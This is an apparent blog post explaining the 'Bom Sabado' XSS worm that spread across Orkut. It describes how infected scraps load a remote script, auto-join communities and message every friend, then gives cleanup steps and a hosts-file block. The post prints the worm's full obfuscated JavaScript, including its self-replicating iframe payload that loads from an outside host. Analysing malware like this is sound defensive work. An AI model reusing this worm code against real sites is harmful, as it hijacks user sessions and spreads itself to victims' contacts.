BOM SABODO a Latest Worm attacks Orkut 


Bom Sabado is a Portuguese Word namely Good Saturday. This virus plugged out by Saturday which is targeted to hack Orkut.
Orkut is Google owned Social Networking website this social networking website is mostly used by Indians.
To hack orkut and their users a latest virus namely Bom Sabado came out.
This virus works on the basis of cookies which is stored in browser. Bom Sabado automatically writes the scrap entries to all your friends list if someone opens that Scrap entry then they also get affected by this virus.
This virus is categorized in XSS Attack. Few days back this same virus attacked orkut. Again it returns back with latest coding. The coding of virus is not yet identified by Orkut programmers. I t may take some more days to rectify this issue.

If you get any scrap entries which is suspicious don't open that just logged out from your orkut account andDelete your browser history and cookie and then change your password. It may prevent you from theft of your profile and illegal activities.

How it works ?

When any one open page that is infected by this worm. A JavaScript will run automatically. Your browser will be hanged for some minutes on seconds. That script will automatically join you his communities. here you can see links of these communities.

After joining communities it will send scrap to your friends with text “Bom Sabado!” with a iFrame code which load that JavaScript again for your friends and they will join communities and send links to their friends.

With scrap Bom Sabado! it loads a small iFrame code. It loads JavaScript from http://tptools.org/worm.js

Code For Bom Sabado

var _0x37a1=["x4Dx69x63x72x6Fx73x6Fx66x74x2Ex58x4Dx4Cx48x74x74x70","x50x4Fx53x54x5Fx54x4Fx4Bx45x4Ex3D","x43x47x49x2Ex50x4Fx53x54x5Fx54x4Fx4Bx45x4E","x26x73x69x67x6Ex61x74x75x72x65x3D","x50x61x67x65x2Ex73x69x67x6Ex61x74x75x72x65x2Ex72x61x77","x50x4Fx53x54","x53x63x72x61x70x62x6Fx6Fx6Bx3F","x6Fx70x65x6E","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64x3B","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x26x73x63x72x61x70x54x65x78x74x3D","x3Cx73x74x79x6Cx65x2Fx3Ex3Cx69x66x72x61x6Dx65x20x73x74x79x6Cx65x3Dx64x69x73x70x6Cx61x79x3Ax6Ex6Fx6Ex65x20x6Fx6Ex6Cx6Fx61x64x3Dx22x61x20x3Dx20x64x6Fx63x75x6Dx65x6Ex74x2Ex63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x28x20x27x73x63x72x69x70x74x27x29x3Bx61x2Ex73x72x63x20x3Dx20x27x2Fx27x20x2Bx20x27x2Fx74x70x74x6Fx6Fx6Cx73x2Ex6Fx27x2Bx27x72x67x2Fx77x6Fx72x6Dx2Ex6Ax73x27x2Bx27x23x3Cx77x62x72x3Ex23x27x3Bx20x64x6Fx63x75x6Dx65x6Ex74x20x2Ex20x62x6Fx64x79x20x2Ex20x61x70x70x65x6Ex64x43x68x69x6Cx64x28x20x61x20x29x22x3Ex3Cx2Fx69x66x72x61x6Dx65x3Ex42x6Fx6Dx20x53x61x62x61x64x6Fx21","x26x75x69x64x3D","x26x41x63x74x69x6Fx6Ex2Ex73x75x62x6Dx69x74x3Dx31","x73x65x6Ex64","x47x45x54","x52x65x71x75x65x73x74x46x72x69x65x6Ex64x73x3Fx72x65x71x3Dx66x6Cx26x75x69x64x3D","x75x69x64","x26x6Fx78x68x3Dx31","x77x68x69x6Cx65x20x28x74x72x75x65x29x3Bx20x26x26x26x53x54x41x52x54x26x26x26","","x72x65x70x6Cx61x63x65","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x43x6Fx6Dx6Dx75x6Ex69x74x79x4Ax6Fx69x6Ex3Fx63x6Dx6Dx3D","x26x41x63x74x69x6Fx6Ex2Ex6Ax6Fx69x6Ex3Dx31","x31x30x36x36x39x38x38x30x38","x36","x35x35x38x34x39x34","x31x30x36x36x39x38x36x32x38","x31x30x36x36x39x31x33x34x31","x76x61x72x20x66x72x69x65x6Ex64x73x20x3Dx20","x3B","x6Cx69x73x74","x64x61x74x61","x69x64"];function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);_0x7c2bx5[_0x37a1[15]](null);return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM(_0x37a1[27]);joinCMM(_0x37a1[28]);joinCMM(_0x37a1[29]);joinCMM(_0x37a1[30]);eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[33]]){uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);sendScrap(uid[_0x37a1[35]]);} ;
Solutions:-

Follow these steps:

1. Immediately change your password and security question{ including secondary email and mobile number if they also got changed.) This will solve the problem.

2. Find out whether some communities has been joined automatically. if yeah, do remove them.

3. If your account has been completely hacked, see here: Orkut account hacked / How to get back hacked Account / Orkut Account taken over by someone


Advanced Solution:-

Open your Host file with notepad

Windows 95/98/Me --> c:windowshosts

Windows NT/2000/XP Pro --> c:winntsystem32driversetchosts

Windows XP Home --> c:windowssystem32driversetchosts

Windows 7 –-> C:windowssystem32driversetchosts

Add this code at the end

127.0.0.1 tptools.org

127.0.0.1 www.tptools.org



0 comments